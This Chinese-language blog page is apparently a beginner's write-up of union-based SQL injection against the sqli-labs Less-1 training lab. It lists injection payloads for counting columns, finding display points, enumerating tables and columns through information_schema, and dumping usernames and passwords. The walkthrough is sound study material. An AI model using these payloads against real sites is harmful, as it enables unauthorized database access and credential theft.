<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>

    <!--Description-->

    

    
        <meta name="description" content="第一次学习sql首先要知道的是一些基础的注入语句：  order by 4 – -判断有多少列union select 1,2,3 –+判断数据显示点union select 1,user(),database()­­ –+­显示出登录用户和数据库名union select 1,(select gr"/>
    

    <!--Author-->
    
        <meta name="author" content="John Doe"/>
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="初识sql"/>
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="第一次学习sql首先要知道的是一些基础的注入语句：  order by 4 – -判断有多少列union select 1,2,3 –+判断数据显示点union select 1,user(),database()­­ –+­显示出登录用户和数据库名union select 1,(select gr"/>
    

    <!--Open Graph Site Name-->
        <meta property="og:site_name" content="Hexo"/>

    <!--Type page-->
    
        <meta property="og:type" content="article"/>
    

    <!--Page Cover-->
    
    
        <meta property="og:image" content="http://example.comimg/home-bg.jpg"/>
    

        <meta name="twitter:card" content="summary_large_image"/>

    

    
        <meta name="twitter:image" content="http://example.comimg/home-bg.jpg"/>
    

    <!-- Title -->
    
    <title>初识sql - Hexo</title>

    <!-- Bootstrap Core CSS -->
    <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet"/>

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>
    <link href="//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"/>
    <link href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css"/>

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet"/>

    <!-- Google Analytics -->
    


    <!-- favicon -->
    

<meta name="generator" content="Hexo 5.4.0"></head>


<body>

    <!-- Menu -->
    <!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">Configurable Title</a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
            <ul class="nav navbar-nav navbar-right">
                
                    <li>
                        <a href="/">
                            
                                Home
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/archives">
                            
                                Archives
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/tags">
                            
                                Tags
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/categories">
                            
                                Categories
                            
                        </a>
                    </li>
                
                    <li>
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-clean-blog">
                            
                                <i class="fa fa-github fa-stack-2x"></i>
                            
                        </a>
                    </li>
                
            </ul>
        </div>
        <!-- /.navbar-collapse -->
    </div>
    <!-- /.container -->
</nav>

    <!-- Main Content -->
    <!-- Page Header -->
<!-- Set your background image for this header in your post front-matter: cover -->

<header class="intro-header" style="background-image: url('/img/home-bg.jpg')">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <div class="post-heading">
                    <h1>初识sql</h1>
                    
                    <span class="meta">
                        <!-- Date and Author -->
                        
                        
                            2021-07-30
                        
                    </span>
                </div>
            </div>
        </div>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">

            <!-- Tags and categories -->
           

            <!-- Gallery -->
            

            <!-- Post Main Content -->
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <hr>
<p>第一次学习sql首先要知道的是一些基础的注入语句：<br>  order by 4 – -<br>判断有多少列<br>union select 1,2,3 –+<br>判断数据显示点<br>union select 1,user(),database()­­ –+<br>­显示出登录用户和数据库名<br>union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = ‘security’ ),3 –+<br>查看数据库有哪些表<br>union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = ‘security’ and table_name=’users’ ),3 –+<br>查看对应表有哪些列<br>union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 –+<br>查看账号密码信息</p>
<p>然后接下来是以sqli-labs的less1展示一下基础的操作。</p>
<p>在第一关是我先判断的是此题的注入点</p>
<p>先手工注入?id=1 and 1=1 跟?id=1 and 1=2发现页面没有报错</p>
<p><img src="https://img-blog.csdnimg.cn/2020011100353766.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTcyODk3Ng==,size_16,color_FFFFFF,t_70"></p>
<p>但是当我们输入 ?id=1’ 时发现了页面报错由此可以判断本题时字符型注入</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201001182619449-1500310613.png"></p>
<p>确定了注入类型后就是判断表中的列数，我们使用order by来确定表中的列数</p>
<p>我们构造?id=1’ and ‘1’=’1’ order by 1–+　　页面回显正常</p>
<p>　　　　?id=1’ and ‘1’=’1’ order by 2–+　　页面回显正常</p>
<p>　　　　?id=1’ and ‘1’=’1’ order by 3–+　　页面回显正常</p>
<p>　　　　?id=1’ and ‘1’=’1’ order by 4–+　　出现报错界面</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201001184521716-690750910.png"></p>
<p>然后我们就确定了字段数，于是用联合查询?id=-1’ union select 1,2,3–+看看union查询是否有回显位（将id=1改为一个数据库不存在的id值）</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201001185344007-1262703116.png"></p>
<p>这样我们就看到了2，3这两个回显位</p>
<p>接下来利用这两个回显位来查询数据库，和数据库版本信息，利用union查询爆出表名</p>
<p>?id=-1’ union select 1,database(),version()–+</p>
<p>?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201001190710346-440037712.png"></p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201001191039433-1928732598.png"></p>
<p>然后我们查看一下这张表的字段名</p>
<p>?id=-1’ union select 1,2,group_concat(column_name)from information_schema.columns where table_name=’users’–+</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201001191433490-2032503790.png"></p>
<p>然后我们就去查询字段信息</p>
<p>?id=-1’ union select 1,2,group_concat(0x5c,username,0x5c,password) from users–+</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201001191824704-1861289982.png"></p>
<p>这样就得到了所有的用户名和密码。</p>


                
            </div>

            <!-- Comments -->
            
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    


                </div>
            
        </div>
    </div>
</article>

    <!-- Footer -->
    <hr />

<!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <ul class="list-inline text-center">
                    

                    

                    
                        <li>
                            <a href="https://github.com/klugjo/hexo-theme-clean-blog" target="_blank">
                                <span class="fa-stack fa-lg">
                                    <i class="fa fa-circle fa-stack-2x"></i>
                                    <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                                </span>
                            </a>
                        </li>
                    

                    

                    

                    
                </ul>
                <p class="copyright text-muted">&copy; 2021 John Doe<br></p>
                <p class="copyright text-muted">Original Theme <a target="_blank" href="http://startbootstrap.com/template-overviews/clean-blog/">Clean Blog</a> from <a href="http://startbootstrap.com/" target="_blank">Start Bootstrap</a></p>
                <p class="copyright text-muted">Adapted for <a target="_blank" href="https://hexo.io/">Hexo</a> by <a href="http://www.codeblocq.com/" target="_blank">Jonathan Klughertz</a></p>
            </div>
        </div>
    </div>
</footer>


    <!-- After footer scripts -->
    
<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Bootstrap -->
<script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Disqus Comments -->



</body>

</html>